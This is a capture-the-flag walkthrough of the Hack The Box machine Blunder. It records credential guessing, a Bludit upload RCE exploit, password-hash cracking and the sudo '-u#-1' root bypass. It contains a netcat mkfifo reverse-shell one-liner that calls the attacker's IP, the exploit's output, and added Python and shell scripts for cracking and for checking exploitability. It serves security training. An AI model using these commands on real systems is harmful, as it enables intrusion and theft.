
Blunder Writeup [HTB]

Blunder is a Linux machine rated easy on Hack The Box. It consists of finding credentials to log in to Bludit, using an authenticated RCE exploit to get an initial shell as www-data, reading the CMS database files to pivot to another user, and finally spawning a root shell through a sudo security bypass.

Enumeration

Running nmap :

nmap -sC -sV 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.29 seconds

Browsing to port 80 we find the blog's front page (screenshot omitted).

Running gobuster we discover the following directories:

gobuster dir -u 10.10.10.191 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -x txt,php -q
/about (Status: 200)
/admin (Status: 301)
/0 (Status: 200)
/install.php (Status: 200)
/robots.txt (Status: 200)
/todo.txt (Status: 200)
/usb (Status: 200)

Inspecting todo.txt we can read the following text :

-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

From this information we have a possible user, fergus.

Browsing to /admin shows the Bludit login page (screenshot omitted).

We have a user but still need a password. There are two approaches: build a wordlist from the site with cewl and brute-force the login form, or inspect the website for likely candidates.

In this case we will investigate, going to /about we find the following text :

Your About page is typically one of the most visited pages on your site, need to be simple with a few key things, such as your name, who are you, how can contact you, a small story, etc.

The mention of a story caught my attention. Back on the blog, the first post is about Stephen King, and one of its lines stands out from the rest:

He has created probably the best fictional character RolandDeschain in The Dark tower series

That character name is a good password candidate; going back to the login page and trying fergus:RolandDeschain confirms it.

Exploitation

Searching for Bludit exploits I found the following authenticated directory traversal in the image upload, which leads to RCE (CVE-2019-16113): https://www.exploit-db.com/exploits/48568

We can use that exploit to run a reverse shell one-liner; the netcat mkfifo variant used below was taken from a reverse shell generator page, filled in with our own IP and port.

Running the exploit :

python3 exploit.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f"

╔╗ ┬  ┬ ┬┌┬┐┬┌┬┐  ╔═╗╦ ╦╔╗╔
╠╩╗│  │ │ │││ │   ╠═╝║║║║║║
╚═╝┴─┘└─┘─┴┘┴ ┴   ╩  ╚╩╝╝╚╝

 CVE-2019-16113 CyberVaca


[+] csrf_token: 0057b0263ced5122f5127fd410d3c296a106b47e
[+] cookie: h37jcdun9l47eg6snspill0ue6
[+] csrf_token: bb0bdf433be5421c5c7976a5b9bc2318674ccffe
[+] Uploading gdhajysx.jpg
[+] Executing command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f
[+] Delete: .htaccess
[+] Delete: gdhajysx.jpg

And we obtain a reverse connection as www-data :

nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.191] 38356
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

This shell can be upgraded into a full interactive tty :

python -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

As www-data we need to pivot to a user with more privileges. Enumerating the system, two different Bludit versions are found under /var/www:

www-data@blunder:/var/www$ ls
bludit-3.10.0a  bludit-3.9.2  html

A user and password hash are found in the users database of bludit-3.10.0a:

www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

The hash is 40 hex characters, consistent with SHA-1, and this users.php carries no salt field, so instead of running john we can try an online lookup such as crackstation :

(screenshot of the crackstation result omitted)
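For the same step done offline, here is an added example (not code from the original writeup, nor from Bludit): a small Python cracker for the hash shown above. It assumes Bludit's hashing scheme is sha1(password + salt); since this users.php has no salt field, the salt is empty. The wordlist is constructed for the demo; a real run would stream rockyou.txt or a cewl-generated list.

```python
import hashlib
from typing import Iterable, Iterator, Optional

# Hash copied from the users.php listing above (key "admin", nickname Hugo).
HUGO_HASH = "faca404fd5c0a31cf1897b823c695c85cffeb98d"


def bludit_password_hash(password: str, salt: str = "") -> str:
    """Reproduce Bludit's stored password format.

    Assumption: Bludit stores sha1($password . $salt). The users.php on this
    box has no "salt" field, so the stored value is a plain SHA-1 of the
    password (which is why crackstation can look it up directly).
    """
    return hashlib.sha1((password + salt).encode("utf-8")).hexdigest()


def crack_sha1(target: str, candidates: Iterable[str], salt: str = "") -> Optional[str]:
    """Return the first candidate whose hash equals target, or None."""
    target = target.strip().lower()
    if len(target) != 40 or any(c not in "0123456789abcdef" for c in target):
        raise ValueError("target is not a 40-hex-char SHA-1 digest")
    for word in candidates:
        if bludit_password_hash(word, salt) == target:
            return word
    return None


def words_from_file(path: str) -> Iterator[str]:
    """Stream a wordlist line by line so large files are not loaded at once."""
    with open(path, "r", encoding="latin-1", errors="ignore") as fh:
        for line in fh:
            yield line.rstrip("\r\n")


# Constructed wordlist for the offline demo; "Password120" is the plaintext
# crackstation returns for this hash.
DEMO_WORDLIST = ["password", "hugo", "bludit", "RolandDeschain", "Password120"]


def crack_hugo() -> Optional[str]:
    return crack_sha1(HUGO_HASH, DEMO_WORDLIST)


if __name__ == "__main__":
    print(crack_hugo())
```

If a future Bludit users.php does include a "salt" value, pass it as the third argument to crack_sha1; candidate order matters only for speed, since the function stops at the first match.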

Now we can switch to hugo with the recovered password :

www-data@blunder:/var/www$ su hugo
Password:
hugo@blunder:/var/www$ id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)

Privilege Escalation

Running sudo -l as Hugo gives an interesting output:

hugo@blunder:~$ sudo -l
Password:
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

Searching for this sudoers pattern turns up a sudo security bypass (CVE-2019-14287): https://www.exploit-db.com/exploits/47502

The rule lets hugo run /bin/bash as any user except root. In sudo versions before 1.8.28, asking for the target user by uid with -u#-1 (or -u#4294967295) passes the !root check, because -1 is not uid 0, but setresuid() treats -1 as "leave unchanged", so the process keeps the root uid sudo already holds. This gives us a root shell :

hugo@blunder:~$ sudo -u#-1 /bin/bash
Password:
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# whoami
root
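Before trying the bypass on another box it is worth checking both preconditions: a sudo older than 1.8.28 (the release that fixed CVE-2019-14287) and a sudoers rule with a !root exclusion. The POSIX sh script below is an added example, not part of the original writeup or of the exploit-db entry; it assumes the first line of `sudo -V` reads "Sudo version X.Y.Zp..." and the sample `sudo -l` text is constructed from the output shown above.

```sh
#!/bin/sh
# Added check for CVE-2019-14287 preconditions (fix shipped in sudo 1.8.28).

# Extract "1.8.25p1" from a `sudo -V` banner such as "Sudo version 1.8.25p1".
sudo_version_from_banner() {
    printf '%s\n' "$1" | awk '/^Sudo version/ { print $3; exit }'
}

# Return 0 (true) when the given sudo version is older than 1.8.28.
# Handles "1.8.25p1" (distro patch suffix), "1.8.31" and "1.9.5p2".
sudo_cve_2019_14287_affected() {
    base=${1%%p*}               # drop the "p1"-style suffix
    major=${base%%.*}
    rest=${base#*.}
    minor=${rest%%.*}
    patch=${rest#*.}
    [ "$patch" = "$rest" ] && patch=0   # no third component given
    [ "$major" -lt 1 ] && return 0
    [ "$major" -gt 1 ] && return 1
    [ "$minor" -lt 8 ] && return 0
    [ "$minor" -gt 8 ] && return 1
    [ "$patch" -lt 28 ]
}

# Return 0 when a `sudo -l` listing contains a "(..., !root)" style rule,
# the sudoers shape the bypass needs.
sudo_l_has_root_exclusion() {
    printf '%s\n' "$1" | grep -q '([^)]*!root)'
}

# Offline demo on constructed input (the version is assumed, the rule text is
# taken from the listing above).
demo() {
    banner="Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1"
    rule="User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash"
    v=$(sudo_version_from_banner "$banner")
    if sudo_cve_2019_14287_affected "$v" && sudo_l_has_root_exclusion "$rule"; then
        echo "sudo $v with a !root rule: try sudo -u#-1 /bin/bash"
    else
        echo "sudo $v: CVE-2019-14287 does not apply here"
    fi
}

# Run the same check against the live host (call this on the target).
check_live_host() {
    v=$(sudo_version_from_banner "$(sudo -V 2>/dev/null)")
    [ -n "$v" ] || { echo "sudo not found"; return 1; }
    if sudo_cve_2019_14287_affected "$v" && sudo_l_has_root_exclusion "$(sudo -l 2>/dev/null)"; then
        echo "sudo $v with a !root rule: try sudo -u#-1 /bin/bash"
    else
        echo "sudo $v: CVE-2019-14287 does not apply here"
    fi
}

demo
```

Both conditions must hold: a patched sudo simply refuses -u#-1, and without a !root (or similar negated) entry the target user is already unrestricted, so no bypass is needed.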
This post is licensed under CC BY 4.0 by the author.